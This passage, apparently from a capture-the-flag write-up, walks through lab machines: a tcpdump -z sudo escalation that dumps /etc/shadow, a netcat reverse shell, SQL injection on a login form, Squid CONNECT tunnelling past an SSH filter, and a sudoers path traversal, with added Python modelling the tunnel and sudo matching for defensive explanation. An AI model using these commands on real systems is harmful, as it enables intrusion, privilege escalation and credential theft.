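The only robust fix is the argv form: once the cipher name is checked against a fixed set and the process is started without a shell, a value like "||bash -i ...||" is just an unsupported cipher and never reaches anything that understands "||".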

Interesting!

[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump

OK, so let's use tcpdump to execute commands: -G 1 rotates the capture file every second, -z runs a post-rotate command on every rotation, and -Z root stops it from dropping privileges first:

echo $’id\ncat /etc/shadow’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/.test -Z root

root:$6$jA85omnRVznNFM4j$voN29bYWJUlRbxgsqia46oC9IK/mdRK5B.IYUrJYs196sfA3ye3rSV790EoD76ABKu29CdtnAXQtIAo6OpNWc1:17681:0:99999:7:::

So let's try a reverse shell. I create /tmp/root with:

nc -e /bin/sh 192.168.0.16 8090

Then I listen with nc -nvlp 8090 on the target itself (192.168.0.16 is the box's own address), and in my fireman shell:
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/root -Z root

whoami
root

cat flag.txt
[+] You’re a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.

+—————————————————————————–+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| — | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|–__ | — |\________________________________/~~\~~| / \ / \ |
| |~~–__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~–_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|—-| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_–~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __–P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+—————————————————————————–+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| …. ……… |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| …. ……… |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| …. ……… |
+—————————————————————————–+

FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther

SkyTower

Looking for the box first:

nmap -Pn -T4 192.168.1.0/24

Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So let’s run a more intense scan while I check the website:

nmap -p- -sV 192.168.1.188
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 14:29 UTC
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds

So let's go to the website on port 80; the one on 3128 only shows an error message.

Nikto doesn't reveal a lot:

nikto -h http://192.168.1.188
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.188
+ Target Hostname: 192.168.1.188
+ Target Port: 80
+ Start Time: 2019-08-29 14:33:26 (GMT0)
—————————————————————————
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 11:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-08-29 14:44:30 (GMT0) (664 seconds)
—————————————————————————

I also checked exploitdb for squid but nothing really interesting there.

Gobuster didn't find much either:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.188
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.188
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/08/30 20:03:24 Starting gobuster
===============================================================
/index (Status: 200)
/background (Status: 200)
/background2 (Status: 200)
/server-status (Status: 403)
===============================================================
2019/08/30 20:04:50 Finished

Nothing in the images:

root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background2.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

Checking the login page with Burp:

POST /login.php HTTP/1.1
Host: 192.168.1.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.188/

Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Upgrade-Insecure-Requests: 1

email='*&password='*

Yep, SQL injection works!

HTTP/1.1 200 OK
Date: Thu, 29 Aug 2019 19:27:42 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 1626
Connection: close
Content-Type: text/html

<HTML>
<div style="height:100%; width:100%;background-image:url('background.jpg');
background-size:100%;
background-position:50% 50%;
background-repeat:no-repeat;">
<div style="
padding-right:8px;
padding-left:10px;
padding-top: 10px;
padding-bottom: 10px;
background-color:white;
border-color: #000000;
border-width: 5px;
border-style: solid;
width: 400px;
height:430px;
position:absolute;
top:50%;
left:50%;
margin-top:-215px; /* this is half the height of your div*/
margin-left:-200px;
">
<br><strong><font size=4>Welcome john@skytech.com</font><br /> </br></strong>As you may know, SkyTech has ceased all international operations.<br><br> To all our long term employees, we wish to convey our thanks for your dedication and hard work.<br><br><strong>Unfortunately, all international contracts, including yours have been terminated.</strong><br><br> The remainder of your contract and retirement fund, <strong>$2</strong> ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.<br><br><strong>Username: john</strong><br><strong>Password: hereisjohn</strong> <br><br> We wish you the best of luck in your future endeavors. <br> </div> </div></HTML>

Good info:

Username: john
Password: hereisjohn

So let's try SSH. Oh crap, I can't: SSH is filtered!

So maybe I can reach it through Squid. proxytunnel speaks HTTP CONNECT to the proxy (-p), asks it to open a connection to 127.0.0.1:22 (-d), which from Squid's point of view is the box itself and therefore not subject to the filter, and exposes that tunnel on local port 4444 (-a):

proxytunnel -p 192.168.1.188:3128 -d 127.0.0.1:22 -a 4444

Then open a new terminal and:

ssh john@127.0.0.1 -p 4444 "/bin/bash"

BINGO

ssh john@127.0.0.1 -p 4444 "/bin/bash"
john@127.0.0.1's password:

id
uid=1000(john) gid=1000(john) groups=1000(john)
fg
/bin/sh: 3: fg: No current job
is
/bin/sh: 4: is: not found
ls
whoami
john
id
uid=1000(john) gid=1000(john) groups=1000(john)
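What proxytunnel does on the wire, as an added example (my code, not the author's and not proxytunnel's): the client sends an HTTP CONNECT for 127.0.0.1:22 to Squid, and on a 200 status the same TCP connection becomes a raw byte pipe to the SSH daemon, which is why the filter on port 22 no longer matters. The Python below builds and parses that exchange and drives it over a socketpair against a constructed stand-in for Squid's ACL that allows CONNECT only to 127.0.0.1:22 and refuses everything else; the ACL behaviour and the SSH banner are constructed, not captured from the box. open_tunnel() runs the same handshake against a real proxy.

```python
import socket
import threading

# Constructed SSH banner for the fake server side; not captured from the box.
FAKE_SSH_BANNER = b"SSH-2.0-OpenSSH_fake\r\n"


def connect_request(host: str, port: int) -> bytes:
    """The HTTP CONNECT request a tunnelling client sends to the proxy."""
    return (f"CONNECT {host}:{port} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n"
            "Proxy-Connection: keep-alive\r\n\r\n").encode()


def parse_connect_status(response: bytes):
    """Return (status_code, reason) from the proxy's status line."""
    status_line = response.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return int(parts[1]), (parts[2] if len(parts) > 2 else "")


def read_headers(sock):
    """Read up to the blank line ending an HTTP head; return (head, leftover).
    Bytes after the blank line already belong to the tunnelled stream."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed before the headers ended")
        buf += chunk
    head, _, leftover = buf.partition(b"\r\n\r\n")
    return head + b"\r\n\r\n", leftover


def tunnel_through(sock, host: str, port: int):
    """Drive the CONNECT handshake on an open proxy socket. On 200 the same
    socket now carries raw bytes to host:port; return it plus any bytes the
    far end already sent (an SSH banner usually arrives immediately)."""
    sock.sendall(connect_request(host, port))
    head, leftover = read_headers(sock)
    code, reason = parse_connect_status(head)
    if code != 200:
        raise PermissionError(f"proxy refused CONNECT: {code} {reason}")
    return sock, leftover


def open_tunnel(proxy_host, proxy_port, dest_host, dest_port):
    """Real use: connect to the proxy and return a socket tunnelled to dest."""
    return tunnel_through(socket.create_connection((proxy_host, proxy_port)),
                          dest_host, dest_port)


def fake_squid_response(request: bytes) -> bytes:
    """Constructed stand-in for the proxy's ACL: CONNECT to the proxy host's
    own loopback SSH port is allowed, anything else is refused."""
    request_line = request.split(b"\r\n", 1)[0]
    if request_line == b"CONNECT 127.0.0.1:22 HTTP/1.1":
        return b"HTTP/1.1 200 Connection established\r\n\r\n"
    return b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"


def demo_tunnel_to_ssh() -> bytes:
    """Run both sides over a socketpair and return what the client reads
    after the handshake: the SSH banner that came through the tunnel."""
    client, proxy = socket.socketpair()

    def squid_side():
        request, _ = read_headers(proxy)
        proxy.sendall(fake_squid_response(request))
        if request.startswith(b"CONNECT 127.0.0.1:22 "):
            proxy.sendall(FAKE_SSH_BANNER)  # bytes from "sshd" behind the proxy
        proxy.close()

    worker = threading.Thread(target=squid_side)
    worker.start()
    sock, data = tunnel_through(client, "127.0.0.1", 22)
    while not data.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    worker.join()
    client.close()
    return data
```

The defensive lesson is on the Squid side: a proxy that honours CONNECT to its own loopback addresses turns every locally bound service into a remotely reachable one, so CONNECT destinations need the same ACL scrutiny as the host firewall.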

Shell is not very good but let’s try to move forward…

Checking home:
ls -al
total 20
drwxr-xr-x 5 root root 4096 Jun 20 2014 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
drwx------ 2 john john 4096 Jun 20 2014 john
drwx------ 2 sara sara 4096 Jun 20 2014 sara
drwx------ 2 william william 4096 Jun 20 2014 william

Nothing… so let’s check the website:

cd /var/www
ls -al
total 5300
drwxr-xr-x 2 root root 4096 Jun 20 2014 .
drwxr-xr-x 12 root root 4096 Jun 20 2014 ..
-rwxr--r-- 1 root root 2831446 Jun 20 2014 background2.jpg
-rwxr--r-- 1 root root 2572609 Jun 20 2014 background.jpg
-rwxr--r-- 1 root root 1136 Jun 20 2014 index.html
-rwxr--r-- 1 root root 2393 Jun 20 2014 login.php
cat login.php
<?php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

BINGO:

OK, fed up with this crappy shell:

/bin/sh -i
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=1000(john) gid=1000(john) groups=1000(john)
$

ok now we’re talking!!!!!

So I uploaded and ran LinEnum:

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"

Kind of strange to see that MySQL is not running:

[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 10648 812 ? Ss 17:29 0:00 init [2]
root 2 0.0 0.0 0 0 ? S 17:29 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 17:29 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 17:29 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 17:29 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 17:29 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 17:29 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 17:29 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 17:29 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 17:29 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 17:29 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 17:29 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 17:29 0:00 [kblockd]
root 17 0.0 0.0 0 0 ? S 17:29 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 17:29 0:00 [kswapd0]
root 19 0.0 0.0 0 0 ? SN 17:29 0:00 [ksmd]
root 20 0.0 0.0 0 0 ? S 17:29 0:00 [fsnotify_mark]
root 21 0.0 0.0 0 0 ? S< 17:29 0:00 [crypto]
root 98 0.0 0.0 0 0 ? S< 17:29 0:00 [ata_sff]
root 103 0.0 0.0 0 0 ? S 17:29 0:00 [khubd]
root 118 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_0]
root 119 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_1]
root 120 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:1]
root 121 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_2]
root 122 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:2]
root 126 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:2]
root 153 0.0 0.0 0 0 ? S 17:29 0:00 [jbd2/sda1-8]
root 154 0.0 0.0 0 0 ? S< 17:29 0:00 [ext4-dio-unwrit]
root 297 0.0 0.2 21380 1356 ? Ss 17:29 0:00 udevd --daemon
root 396 0.0 0.2 21376 1052 ? S 17:29 0:00 udevd --daemon
root 397 0.0 0.1 21376 1008 ? S 17:29 0:00 udevd --daemon
root 415 0.0 0.0 0 0 ? S< 17:29 0:00 [kpsmoused]
root 417 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:3]
root 1697 0.0 0.0 0 0 ? S 17:29 0:00 [flush-8:0]
root 1819 0.0 0.3 52776 1532 ? Sl 17:29 0:00 /usr/sbin/rsyslogd -c5
root 1853 0.0 0.1 4116 636 ? Ss 17:29 0:00 /usr/sbin/acpid
root 1889 0.0 1.8 154280 9464 ? Ss 17:29 0:00 /usr/sbin/apache2 -k start
root 1932 0.0 0.2 20408 1040 ? Ss 17:29 0:00 /usr/sbin/cron
www-data 1964 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1965 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1966 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1967 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1968 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
root 2015 0.0 0.5 49956 2912 ? Ss 17:29 0:00 /usr/sbin/squid3 -YC -f /etc/squid3/squid.conf
root 2090 0.0 0.1 16256 944 tty1 Ss+ 17:29 0:00 /sbin/getty 38400 tty1
root 2091 0.0 0.1 16256 944 tty2 Ss+ 17:29 0:00 /sbin/getty 38400 tty2
root 2092 0.0 0.1 16256 940 tty3 Ss+ 17:29 0:00 /sbin/getty 38400 tty3
root 2093 0.0 0.1 16256 940 tty4 Ss+ 17:29 0:00 /sbin/getty 38400 tty4
root 2094 0.0 0.1 16256 948 tty5 Ss+ 17:29 0:00 /sbin/getty 38400 tty5
root 2095 0.0 0.1 16256 944 tty6 Ss+ 17:29 0:00 /sbin/getty 38400 tty6
root 2106 0.0 0.5 9960 2576 ? Ss 17:30 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 2147 0.0 0.2 49932 1212 ? Ss 17:30 0:00 /usr/sbin/sshd
proxy 2174 0.0 3.2 86988 16288 ? S 17:48 0:00 (squid) -YC -f /etc/squid3/squid.conf
proxy 2175 0.0 0.2 20100 1052 ? S 17:48 0:00 (unlinkd)
root 2176 0.0 0.6 69216 3508 ? Ss 17:48 0:00 sshd: john [priv]
john 2178 0.0 0.3 69216 1720 ? S 17:48 0:00 sshd: john@notty
john 2179 0.0 0.2 10752 1360 ? Ss 17:48 0:00 /bin/bash
john 2194 0.0 0.1 4180 640 ? S 17:56 0:00 /bin/sh -i
root 2204 0.0 0.0 0 0 ? S 18:00 0:00 [kworker/0:0]
john 2215 0.0 0.3 11332 1992 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2216 0.1 0.2 11356 1508 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2217 0.0 0.1 5596 652 ? S 18:04 0:00 tee -a
john 2439 0.0 0.2 11356 1212 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2440 0.0 0.2 16836 1268 ? R 18:04 0:00 ps aux

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget

[-] SGID files:
-rwxr-sr-x 1 root shadow 54904 May 25 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 14624 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 23056 Dec 11 2012 /usr/bin/wall
-rwxr-sr-x 1 root ssh 129088 Apr 2 2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23312 May 25 2012 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 35880 Jul 3 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 35408 Apr 29 2012 /sbin/unix_chkpwd

TROLL:

$ cat /etc/issue
Welcome to the SkyTower, try to gain access
to the flag.txt file in the /root/ directory

OK, going nowhere for now, and with no TTY it is painful. Let's try to fix this:

ssh -t john@127.0.0.1 -p 4444 "/bin/sh"

Yeah… better!!!

But there is still something wrong, so let's check the login process:

.bashrc has an exit statement (so every interactive bash quits immediately). I deleted the file and logged in again.

better! Now I have a real TTY..

Going back to MySQL with the credentials I found (root/root):

mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+

Trying to log in as sara and removing her .bashrc at the same time, in case it has the same trick:

john@SkyTower:~$ ssh sara@localhost "rm .bashrc"
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/john/.ssh/known_hosts).
sara@localhost's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

sara@SkyTower:~$ sudo ls /accounts/../root
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
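Why /accounts/../root/flag.txt gets through, as an added example that is not part of the original write-up: sudoers compares command arguments as one space-joined string with fnmatch(3) and without FNM_PATHNAME, so "*" matches "/" (and spaces), and sudo never canonicalises the path before matching. The Python below models that literal matching for the two rules shown by sudo -l above, and beside it the check the rule's author presumably intended, which resolves ".." and requires the result to stay under /accounts. The sample command lines are constructed; only the one actually typed on the box comes from the page.

```python
import fnmatch
import os.path

# The two rules 'sudo -l' printed for sara: (binary, argument pattern).
SUDO_RULES = [("/bin/cat", "/accounts/*"), ("/bin/ls", "/accounts/*")]


def sudo_allows(rules, command: str, args) -> bool:
    """sudo's literal rule check. The binary must match exactly; the
    arguments are joined into one space-separated string and compared to the
    pattern with fnmatch(3) without FNM_PATHNAME, so '*' also matches '/'
    and ' ', and the path is never canonicalised. fnmatch.fnmatchcase has
    exactly those semantics."""
    joined = " ".join(args)
    return any(command == binary and fnmatch.fnmatchcase(joined, pattern)
               for binary, pattern in rules)


def hardened_allows(command: str, args, root: str = "/accounts") -> bool:
    """What the rule's author meant: exactly one argument which, after
    resolving '..', still lies under /accounts. Put this in a wrapper script
    and grant sudo on the wrapper, not on cat with a wildcard. normpath keeps
    the example filesystem-free; a real wrapper should use os.path.realpath
    so a symlink planted inside /accounts cannot point outside either."""
    if command not in {binary for binary, _ in SUDO_RULES} or len(args) != 1:
        return False
    resolved = os.path.normpath(args[0])
    return resolved == root or resolved.startswith(root.rstrip("/") + "/")


# Constructed attempts, including the two used on the box.
ATTEMPTS = [
    ("/bin/cat", ["/accounts/sara"]),
    ("/bin/ls", ["/accounts/../root"]),
    ("/bin/cat", ["/accounts/../root/flag.txt"]),
    ("/bin/cat", ["/accounts/x", "/etc/shadow"]),  # '*' spans the space too
    ("/bin/cat", ["/etc/shadow"]),
]


def audit(attempts=ATTEMPTS):
    """For each attempt: (command line, allowed by sudo as configured,
    allowed by the intended check)."""
    return [(" ".join([cmd, *args]),
             sudo_allows(SUDO_RULES, cmd, args),
             hardened_allows(cmd, args))
            for cmd, args in attempts]
```

The fourth attempt is the one people forget: because the pattern is matched against the whole argument string, a trailing "*" also authorises any number of extra arguments, so "cat /accounts/x /etc/shadow" is permitted by the rule as written.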

The wildcard in the sudoers rule is matched against the literal argument, so the ".." is never resolved and the traversal out of /accounts is allowed. Then, easy:

su –
Password:
root@SkyTower:~# whoami
root

This one was not like the other machines. I found it tricky!

BrainPan

This one was really fun: a mix of Windows and Linux, and my first attempt at overflowing a Windows binary from a Linux machine.

nmap -sC -sV -oA brainpan.nmap 192.168.1.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-23 15:28 UTC
Nmap scan report for brainpan.lan (192.168.1.149)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.70%I=7%D=8/23%Time=5D600619%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,”_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20″);
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)

On port 10000 I see a website.

Trying to enumerate the website with dirbuster….

dirbuster -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.149 >brainpan.dirb

In the meantime, I started a netcat against port 9999:

root@kali:~/boxes/brainpan# nc 192.168.1.149 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> test
ACCESS DENIED
root@kali:~/boxes/brainpan#

Dirbuster found a /bin directory, containing brainpan.exe.

I downloaded the file and now trying to see what it is:

file brainpan.exe
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

OK so we have a win32 binary…

I ran cat on it and, among the binary noise, found this:

[get_reply] copied %d bytes to buffer
shitstorm

_| _|
